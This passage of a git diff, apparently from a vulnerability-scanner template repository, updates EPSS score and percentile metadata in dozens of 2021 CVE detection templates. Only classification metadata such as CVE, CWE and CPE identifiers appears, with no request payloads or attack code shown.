b/http/cves/2021/CVE-2021-29203.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-29203 cwe-id: CWE-306 epss-score: 0.86779 - epss-percentile: 0.99401 + epss-percentile: 0.99402 cpe: cpe:2.3:a:hp:edgeline_infrastructure_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-29441.yaml b/http/cves/2021/CVE-2021-29441.yaml index 03d2bc3e5a9..49d591bb463 100644 --- a/http/cves/2021/CVE-2021-29441.yaml +++ b/http/cves/2021/CVE-2021-29441.yaml @@ -28,7 +28,7 @@ info: cve-id: CVE-2021-29441 cwe-id: CWE-290 epss-score: 0.94053 - epss-percentile: 0.99894 + epss-percentile: 0.99893 cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-29442.yaml b/http/cves/2021/CVE-2021-29442.yaml index 714ebc96714..19dcd0dd42e 100644 --- a/http/cves/2021/CVE-2021-29442.yaml +++ b/http/cves/2021/CVE-2021-29442.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-29442 cwe-id: CWE-306 epss-score: 0.94002 - epss-percentile: 0.99885 + epss-percentile: 0.99884 cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-29484.yaml b/http/cves/2021/CVE-2021-29484.yaml index 18c00a613f8..e74d444499d 100644 --- a/http/cves/2021/CVE-2021-29484.yaml +++ b/http/cves/2021/CVE-2021-29484.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-29484 cwe-id: CWE-79 epss-score: 0.82004 - epss-percentile: 0.99169 + epss-percentile: 0.99171 cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-29505.yaml b/http/cves/2021/CVE-2021-29505.yaml index 7a0a5a21893..9336f2559cb 100644 --- a/http/cves/2021/CVE-2021-29505.yaml +++ b/http/cves/2021/CVE-2021-29505.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-29505 cwe-id: CWE-502 epss-score: 0.90769 - epss-percentile: 0.99601 + epss-percentile: 0.99599 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-29622.yaml b/http/cves/2021/CVE-2021-29622.yaml index cbfd2036224..adfda016b94 100644 --- a/http/cves/2021/CVE-2021-29622.yaml +++ b/http/cves/2021/CVE-2021-29622.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-29622 cwe-id: CWE-601 epss-score: 0.8663 - epss-percentile: 0.99394 + epss-percentile: 0.99396 cpe: cpe:2.3:a:prometheus:prometheus:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3002.yaml b/http/cves/2021/CVE-2021-3002.yaml index 669e4252257..28fc6baa543 100644 --- a/http/cves/2021/CVE-2021-3002.yaml +++ b/http/cves/2021/CVE-2021-3002.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-3002 cwe-id: CWE-79 epss-score: 0.30353 - epss-percentile: 0.96548 + epss-percentile: 0.96551 cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-30049.yaml b/http/cves/2021/CVE-2021-30049.yaml index e1c98485f18..e8b7a81abcb 100644 --- a/http/cves/2021/CVE-2021-30049.yaml +++ b/http/cves/2021/CVE-2021-30049.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-30049 cwe-id: CWE-79 epss-score: 0.05184 - epss-percentile: 0.89597 + epss-percentile: 0.89594 cpe: cpe:2.3:a:sysaid:sysaid:20.3.64:b14:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3007.yaml b/http/cves/2021/CVE-2021-3007.yaml index eb59ae7574f..e893575d2fb 100644 --- a/http/cves/2021/CVE-2021-3007.yaml +++ b/http/cves/2021/CVE-2021-3007.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-3007 cwe-id: CWE-502 - epss-score: 0.91409 - epss-percentile: 0.99641 + epss-score: 0.91339 + epss-percentile: 0.99637 cpe: cpe:2.3:a:getlaminas:laminas-http:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-30116.yaml b/http/cves/2021/CVE-2021-30116.yaml index f560fc850bf..81b23d3fa86 100644 --- a/http/cves/2021/CVE-2021-30116.yaml +++ b/http/cves/2021/CVE-2021-30116.yaml @@ -21,7 +21,7 @@ info: cvss-score: 10.0 cve-id: CVE-2021-30116 epss-score: 0.4984 - epss-percentile: 0.97722 + epss-percentile: 0.97716 cwe-id: CWE-522 cpe: cpe:2.3:a:kaseya:virtual_system_administrator:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2021/CVE-2021-30118.yaml b/http/cves/2021/CVE-2021-30118.yaml index ae0ca827bf9..bfaa4582850 100644 --- a/http/cves/2021/CVE-2021-30118.yaml +++ b/http/cves/2021/CVE-2021-30118.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-30118 cwe-id: CWE-434 epss-score: 0.56392 - epss-percentile: 0.98032 + epss-percentile: 0.9803 cpe: cpe:2.3:a:kaseya:vsa:*:*:*:*:-:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-30151.yaml b/http/cves/2021/CVE-2021-30151.yaml index f5217f61e11..61afedd71d4 100644 --- a/http/cves/2021/CVE-2021-30151.yaml +++ b/http/cves/2021/CVE-2021-30151.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-30151 cwe-id: CWE-79 epss-score: 0.2396 - epss-percentile: 0.95851 + epss-percentile: 0.95855 cpe: cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-30175.yaml b/http/cves/2021/CVE-2021-30175.yaml index 757caffc077..2ff529d7e02 100644 --- a/http/cves/2021/CVE-2021-30175.yaml +++ b/http/cves/2021/CVE-2021-30175.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-30175 cwe-id: CWE-89 epss-score: 0.7447 - epss-percentile: 0.98802 + epss-percentile: 0.98799 cpe: cpe:2.3:a:zerof:web_server:1.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-3019.yaml b/http/cves/2021/CVE-2021-3019.yaml index 2361c62319f..61caf59dda8 100644 --- a/http/cves/2021/CVE-2021-3019.yaml +++ b/http/cves/2021/CVE-2021-3019.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-3019 cwe-id: CWE-22 epss-score: 0.92483 - epss-percentile: 0.99721 + epss-percentile: 0.9972 cpe: cpe:2.3:a:lanproxy_project:lanproxy:0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-30203.yaml b/http/cves/2021/CVE-2021-30203.yaml index e87f68f3b43..b93cb4c889b 100644 --- a/http/cves/2021/CVE-2021-30203.yaml +++ b/http/cves/2021/CVE-2021-30203.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.2 cve-id: CVE-2021-30203 epss-score: 0.01296 - epss-percentile: 0.79273 + epss-percentile: 0.79269 cwe-id: CWE-79 cpe: cpe:2.3:a:dzzoffice:dzzoffice:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2021/CVE-2021-30497.yaml b/http/cves/2021/CVE-2021-30497.yaml index 6f0dbce2004..115536891d2 100644 --- a/http/cves/2021/CVE-2021-30497.yaml +++ b/http/cves/2021/CVE-2021-30497.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-30497 cwe-id: CWE-22 epss-score: 0.93774 - epss-percentile: 0.99845 + epss-percentile: 0.99846 cpe: cpe:2.3:a:ivanti:avalanche:6.3.2:*:*:*:*:windows:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31316.yaml b/http/cves/2021/CVE-2021-31316.yaml index 327cabd39a4..8f51219809d 100644 --- a/http/cves/2021/CVE-2021-31316.yaml +++ b/http/cves/2021/CVE-2021-31316.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-31324 cwe-id: CWE-89 epss-score: 0.65425 - epss-percentile: 0.98424 + epss-percentile: 0.98427 cpe: cpe:2.3:a:control-webpanel:webpanel:-:*:*:*:*:*:*:* metadata: vendor: control-webpanel diff --git a/http/cves/2021/CVE-2021-31324.yaml b/http/cves/2021/CVE-2021-31324.yaml index 67ee794eb36..a7200381126 100644 --- a/http/cves/2021/CVE-2021-31324.yaml +++ b/http/cves/2021/CVE-2021-31324.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-31324 cwe-id: CWE-78 epss-score: 0.82331 - epss-percentile: 0.99189 + epss-percentile: 0.99191 cpe: cpe:2.3:a:control-webpanel:webpanel:-:*:*:*:*:*:*:* metadata: vendor: control-webpanel diff --git a/http/cves/2021/CVE-2021-31581.yaml b/http/cves/2021/CVE-2021-31581.yaml index 8426763ac61..0f4e80e4218 100644 --- a/http/cves/2021/CVE-2021-31581.yaml +++ b/http/cves/2021/CVE-2021-31581.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-31581 cwe-id: CWE-269,CWE-312 epss-score: 0.15575 - epss-percentile: 0.94471 + epss-percentile: 0.94469 cpe: cpe:2.3:a:akkadianlabs:ova_appliance:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31589.yaml b/http/cves/2021/CVE-2021-31589.yaml index c8f044d3f9b..7f9f0bc936a 100644 --- a/http/cves/2021/CVE-2021-31589.yaml +++ b/http/cves/2021/CVE-2021-31589.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-31589 cwe-id: CWE-79 epss-score: 0.27167 - epss-percentile: 0.96231 + epss-percentile: 0.96234 cpe: cpe:2.3:o:beyondtrust:appliance_base_software:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31682.yaml b/http/cves/2021/CVE-2021-31682.yaml index c6aa3ae0fda..a6c360a793a 100644 --- a/http/cves/2021/CVE-2021-31682.yaml +++ b/http/cves/2021/CVE-2021-31682.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-31682 cwe-id: CWE-79 epss-score: 0.41198 - epss-percentile: 0.97269 + epss-percentile: 0.97267 cpe: cpe:2.3:a:automatedlogic:webctrl:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31856.yaml b/http/cves/2021/CVE-2021-31856.yaml index 4d4970d3928..c28ad79f943 100644 --- a/http/cves/2021/CVE-2021-31856.yaml +++ b/http/cves/2021/CVE-2021-31856.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-31856 cwe-id: CWE-89 epss-score: 0.79924 - epss-percentile: 0.99063 + epss-percentile: 0.99062 cpe: cpe:2.3:a:layer5:meshery:0.5.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31862.yaml b/http/cves/2021/CVE-2021-31862.yaml index faf7168e3d4..45467bb41b7 100644 --- a/http/cves/2021/CVE-2021-31862.yaml +++ b/http/cves/2021/CVE-2021-31862.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-31862 cwe-id: CWE-79 epss-score: 0.41302 - epss-percentile: 0.97276 + epss-percentile: 0.97274 cpe: cpe:2.3:a:sysaid:sysaid:20.4.74:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-32305.yaml b/http/cves/2021/CVE-2021-32305.yaml index f44add57ef2..5339e063baa 100644 --- a/http/cves/2021/CVE-2021-32305.yaml +++ b/http/cves/2021/CVE-2021-32305.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-32305 cwe-id: CWE-78 epss-score: 0.93186 - epss-percentile: 0.99785 + epss-percentile: 0.99784 cpe: cpe:2.3:a:websvn:websvn:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-32478.yaml b/http/cves/2021/CVE-2021-32478.yaml index 2dc2430d84d..499dd820f7c 100644 --- a/http/cves/2021/CVE-2021-32478.yaml +++ b/http/cves/2021/CVE-2021-32478.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-32478 cwe-id: CWE-79 epss-score: 0.03754 - epss-percentile: 0.87691 + epss-percentile: 0.87692 cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-32820.yaml b/http/cves/2021/CVE-2021-32820.yaml index 71f7b7ce3e8..29533883d5d 100644 --- a/http/cves/2021/CVE-2021-32820.yaml +++ b/http/cves/2021/CVE-2021-32820.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-32820 cwe-id: CWE-94,CWE-200 epss-score: 0.90956 - epss-percentile: 0.99616 + epss-percentile: 0.99614 cpe: cpe:2.3:a:express_handlebars_project:express_handlebars:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-32853.yaml b/http/cves/2021/CVE-2021-32853.yaml index d93c49ba52d..15568f5dfb9 100644 --- a/http/cves/2021/CVE-2021-32853.yaml +++ b/http/cves/2021/CVE-2021-32853.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-32853 cwe-id: CWE-79 epss-score: 0.85495 - epss-percentile: 0.99338 + epss-percentile: 0.99337 cpe: cpe:2.3:a:erxes:erxes:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3287.yaml b/http/cves/2021/CVE-2021-3287.yaml index 38a25f37b78..f406c31bd67 100644 --- a/http/cves/2021/CVE-2021-3287.yaml +++ b/http/cves/2021/CVE-2021-3287.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-3287 epss-score: 0.8849 - epss-percentile: 0.9948 + epss-percentile: 0.99479 cwe-id: CWE-502 cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2021/CVE-2021-3293.yaml b/http/cves/2021/CVE-2021-3293.yaml index b7eeeec4381..582f6d48e5a 100644 --- a/http/cves/2021/CVE-2021-3293.yaml +++ b/http/cves/2021/CVE-2021-3293.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-3293 cwe-id: CWE-22 epss-score: 0.6791 - epss-percentile: 0.98528 + epss-percentile: 0.98531 cpe: cpe:2.3:a:emlog:emlog:5.3.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3297.yaml b/http/cves/2021/CVE-2021-3297.yaml index 52eb3abdeb6..0f0c90e3edc 100644 --- a/http/cves/2021/CVE-2021-3297.yaml +++ b/http/cves/2021/CVE-2021-3297.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-3297 cwe-id: CWE-287 epss-score: 0.86299 - epss-percentile: 0.9938 + epss-percentile: 0.99382 cpe: cpe:2.3:o:zyxel:nbg2105_firmware:v1.00\(aagu.2\)c0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33044.yaml b/http/cves/2021/CVE-2021-33044.yaml index effd7a247ba..0c7bd352078 100644 --- a/http/cves/2021/CVE-2021-33044.yaml +++ b/http/cves/2021/CVE-2021-33044.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-33044 cwe-id: CWE-287 epss-score: 0.94269 - epss-percentile: 0.9993 + epss-percentile: 0.99931 cpe: cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33045.yaml b/http/cves/2021/CVE-2021-33045.yaml index d9e97aa00b4..9788e6e6185 100644 --- a/http/cves/2021/CVE-2021-33045.yaml +++ b/http/cves/2021/CVE-2021-33045.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-33045 cwe-id: CWE-287 epss-score: 0.94171 - epss-percentile: 0.99911 + epss-percentile: 0.9991 cpe: cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33357.yaml b/http/cves/2021/CVE-2021-33357.yaml index 417e952626d..d2b66aecf61 100644 --- a/http/cves/2021/CVE-2021-33357.yaml +++ b/http/cves/2021/CVE-2021-33357.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-33357 cwe-id: CWE-78 epss-score: 0.94007 - epss-percentile: 0.99887 + epss-percentile: 0.99885 cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33558.yaml b/http/cves/2021/CVE-2021-33558.yaml index 661766f434c..99e87b70a0b 100644 --- a/http/cves/2021/CVE-2021-33558.yaml +++ b/http/cves/2021/CVE-2021-33558.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.5 cve-id: CVE-2021-33558 epss-score: 0.93409 - epss-percentile: 0.99807 + epss-percentile: 0.99806 cpe: cpe:2.3:a:boa:boa:0.94.13:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33690.yaml b/http/cves/2021/CVE-2021-33690.yaml index e206c2257b6..a7bd63e6500 100644 --- a/http/cves/2021/CVE-2021-33690.yaml +++ b/http/cves/2021/CVE-2021-33690.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-33690 cwe-id: CWE-918 epss-score: 0.93259 - epss-percentile: 0.99792 + epss-percentile: 0.99791 cpe: cpe:2.3:a:sap:netweaver_development_infrastructure:7.11:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-3377.yaml b/http/cves/2021/CVE-2021-3377.yaml index 44c23ca6fa2..e01bed5a026 100644 --- a/http/cves/2021/CVE-2021-3377.yaml +++ b/http/cves/2021/CVE-2021-3377.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-3377 cwe-id: CWE-79 epss-score: 0.46141 - epss-percentile: 0.97546 + epss-percentile: 0.97541 cpe: cpe:2.3:a:ansi_up_project:ansi_up:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33829.yaml b/http/cves/2021/CVE-2021-33829.yaml index 2d7cd7f2b88..94e387da59f 100644 --- a/http/cves/2021/CVE-2021-33829.yaml +++ b/http/cves/2021/CVE-2021-33829.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-33829 cwe-id: CWE-79 epss-score: 0.47617 - epss-percentile: 0.97606 + epss-percentile: 0.97601 cpe: cpe:2.3:a:ckeditor:ckeditor:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-33851.yaml b/http/cves/2021/CVE-2021-33851.yaml index e7a0d074120..60f6b0fb625 100644 --- a/http/cves/2021/CVE-2021-33851.yaml +++ b/http/cves/2021/CVE-2021-33851.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-33851 cwe-id: CWE-79 epss-score: 0.07455 - epss-percentile: 0.91504 + epss-percentile: 0.91501 cpe: cpe:2.3:a:apasionados:customize_login_image:3.4:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-33904.yaml b/http/cves/2021/CVE-2021-33904.yaml index 241ecfc408a..f7fcf561129 100644 --- a/http/cves/2021/CVE-2021-33904.yaml +++ b/http/cves/2021/CVE-2021-33904.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-33904 cwe-id: CWE-79 epss-score: 0.12306 - epss-percentile: 0.93653 + epss-percentile: 0.93648 cpe: cpe:2.3:a:accela:civic_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-34370.yaml b/http/cves/2021/CVE-2021-34370.yaml index e65a7782e5f..cdbfe9a3fcd 100644 --- a/http/cves/2021/CVE-2021-34370.yaml +++ b/http/cves/2021/CVE-2021-34370.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-34370 cwe-id: CWE-79 epss-score: 0.11651 - epss-percentile: 0.93456 + epss-percentile: 0.9345 cpe: cpe:2.3:a:accela:civic_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-34473.yaml b/http/cves/2021/CVE-2021-34473.yaml index 1ce193f437a..5b2a8df849b 100644 --- a/http/cves/2021/CVE-2021-34473.yaml +++ b/http/cves/2021/CVE-2021-34473.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-34473 cwe-id: CWE-918 epss-score: 0.9423 - epss-percentile: 0.99921 + epss-percentile: 0.9992 cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-34622.yaml b/http/cves/2021/CVE-2021-34622.yaml index 323d8f09a26..0a0c3931608 100644 --- a/http/cves/2021/CVE-2021-34622.yaml +++ b/http/cves/2021/CVE-2021-34622.yaml @@ -16,7 +16,7 @@ info: classification: cve-id: CVE-2021-34622 epss-score: 0.51775 - epss-percentile: 0.97812 + epss-percentile: 0.97808 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cwe-id: CWE-269 diff --git a/http/cves/2021/CVE-2021-34624.yaml b/http/cves/2021/CVE-2021-34624.yaml index 68b028fadbe..0ebe5596ff8 100644 --- a/http/cves/2021/CVE-2021-34624.yaml +++ b/http/cves/2021/CVE-2021-34624.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-34624 cwe-id: CWE-434 epss-score: 0.64957 - epss-percentile: 0.98407 + epss-percentile: 0.9841 cpe: cpe:2.3:a:properfraction:profilepress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-34640.yaml b/http/cves/2021/CVE-2021-34640.yaml index ec740557e6a..e8b96dbbba7 100644 --- a/http/cves/2021/CVE-2021-34640.yaml +++ b/http/cves/2021/CVE-2021-34640.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-34640 cwe-id: CWE-79 epss-score: 0.12179 - epss-percentile: 0.93617 + epss-percentile: 0.93612 cpe: cpe:2.3:a:securimage-wp-fixed_project:securimage-wp-fixed:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-34643.yaml b/http/cves/2021/CVE-2021-34643.yaml index 43355192fa9..95390957532 100644 --- a/http/cves/2021/CVE-2021-34643.yaml +++ b/http/cves/2021/CVE-2021-34643.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-34643 cwe-id: CWE-79 epss-score: 0.23353 - epss-percentile: 0.95778 + epss-percentile: 0.95782 cpe: cpe:2.3:a:skaut-bazar_project:skaut-bazar:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-35265.yaml b/http/cves/2021/CVE-2021-35265.yaml index a8f0d548105..01aa350da52 100644 --- a/http/cves/2021/CVE-2021-35265.yaml +++ b/http/cves/2021/CVE-2021-35265.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-35265 cwe-id: CWE-79 epss-score: 0.05313 - epss-percentile: 0.89732 + epss-percentile: 0.89728 cpe: cpe:2.3:a:maxsite:maxsite_cms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-35323.yaml b/http/cves/2021/CVE-2021-35323.yaml index 4f2b286fac8..13651877c8c 100644 --- a/http/cves/2021/CVE-2021-35323.yaml +++ b/http/cves/2021/CVE-2021-35323.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-35323 cwe-id: CWE-79 epss-score: 0.03031 - epss-percentile: 0.86254 + epss-percentile: 0.86255 cpe: cpe:2.3:a:bludit:bludit:3.13.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-35336.yaml b/http/cves/2021/CVE-2021-35336.yaml index 1444e4d0a60..2ee14941a2b 100644 --- a/http/cves/2021/CVE-2021-35336.yaml +++ b/http/cves/2021/CVE-2021-35336.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-35336 cwe-id: CWE-1188 epss-score: 0.88398 - epss-percentile: 0.99475 + epss-percentile: 0.99474 cpe: cpe:2.3:h:tieline:ip_audtio_gateway:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-35380.yaml b/http/cves/2021/CVE-2021-35380.yaml index 04158a10bd7..c4d3405f547 100644 --- a/http/cves/2021/CVE-2021-35380.yaml +++ b/http/cves/2021/CVE-2021-35380.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-35380 cwe-id: CWE-22 epss-score: 0.73487 - epss-percentile: 0.9876 + epss-percentile: 0.98759 cpe: cpe:2.3:a:solari:termtalk_server:3.24.0.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-35488.yaml b/http/cves/2021/CVE-2021-35488.yaml index 30cddd23a88..9c084325d4c 100644 --- a/http/cves/2021/CVE-2021-35488.yaml +++ b/http/cves/2021/CVE-2021-35488.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-35488 cwe-id: CWE-79 epss-score: 0.12795 - epss-percentile: 0.93795 + epss-percentile: 0.93791 cpe: cpe:2.3:a:thruk:thruk:2.40-2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-3577.yaml b/http/cves/2021/CVE-2021-3577.yaml index 7a21e967bb4..cb8ae678da6 100644 --- a/http/cves/2021/CVE-2021-3577.yaml +++ b/http/cves/2021/CVE-2021-3577.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-3577 cwe-id: CWE-863,CWE-78 epss-score: 0.86428 - epss-percentile: 0.99385 + epss-percentile: 0.99387 cpe: cpe:2.3:o:binatoneglobal:halo\+_camera_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-36356.yaml b/http/cves/2021/CVE-2021-36356.yaml index ed3e056d5d9..3b3a3ed9c27 100644 --- a/http/cves/2021/CVE-2021-36356.yaml +++ b/http/cves/2021/CVE-2021-36356.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-36356 cwe-id: CWE-434 epss-score: 0.91156 - epss-percentile: 0.99628 + epss-percentile: 0.99627 cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-36380.yaml b/http/cves/2021/CVE-2021-36380.yaml index 5e548f0ee64..facdb6c1427 100644 --- a/http/cves/2021/CVE-2021-36380.yaml +++ b/http/cves/2021/CVE-2021-36380.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-36380 cwe-id: CWE-78 epss-score: 0.93643 - epss-percentile: 0.9983 + epss-percentile: 0.99831 cpe: cpe:2.3:a:sunhillo:sureline:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-36580.yaml b/http/cves/2021/CVE-2021-36580.yaml index 53219322acd..e2b15af6b09 100644 --- a/http/cves/2021/CVE-2021-36580.yaml +++ b/http/cves/2021/CVE-2021-36580.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-36580 cwe-id: CWE-601 epss-score: 0.096 - epss-percentile: 0.92635 + epss-percentile: 0.92628 cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-36646.yaml b/http/cves/2021/CVE-2021-36646.yaml index 45248a28d70..74650080aed 100644 --- a/http/cves/2021/CVE-2021-36646.yaml +++ b/http/cves/2021/CVE-2021-36646.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-36646 cwe-id: CWE-79 epss-score: 0.01158 - epss-percentile: 0.78137 + epss-percentile: 0.78131 metadata: max-request: 2 vendor: kalcaddle diff --git a/http/cves/2021/CVE-2021-36873.yaml b/http/cves/2021/CVE-2021-36873.yaml index 2a183d81d6d..04e4a68bf06 100644 --- a/http/cves/2021/CVE-2021-36873.yaml +++ b/http/cves/2021/CVE-2021-36873.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-36873 cwe-id: CWE-79 epss-score: 0.03985 - epss-percentile: 0.88079 + epss-percentile: 0.8808 cpe: cpe:2.3:a:webence:iq_block_country:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-37216.yaml b/http/cves/2021/CVE-2021-37216.yaml index 96f969ba2f5..104317b22ce 100644 --- a/http/cves/2021/CVE-2021-37216.yaml +++ b/http/cves/2021/CVE-2021-37216.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-37216 cwe-id: CWE-79 epss-score: 0.04668 - epss-percentile: 0.89 + epss-percentile: 0.88997 cpe: cpe:2.3:o:qsan:xn8024r_firmware:3.1.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-37292.yaml b/http/cves/2021/CVE-2021-37292.yaml index cbc70cec672..05fac3f8c95 100644 --- a/http/cves/2021/CVE-2021-37292.yaml +++ b/http/cves/2021/CVE-2021-37292.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.2 cve-id: CVE-2021-37292 epss-score: 0.05562 - epss-percentile: 0.90005 + epss-percentile: 0.90004 cwe-id: NVD-CWE-Other cpe: 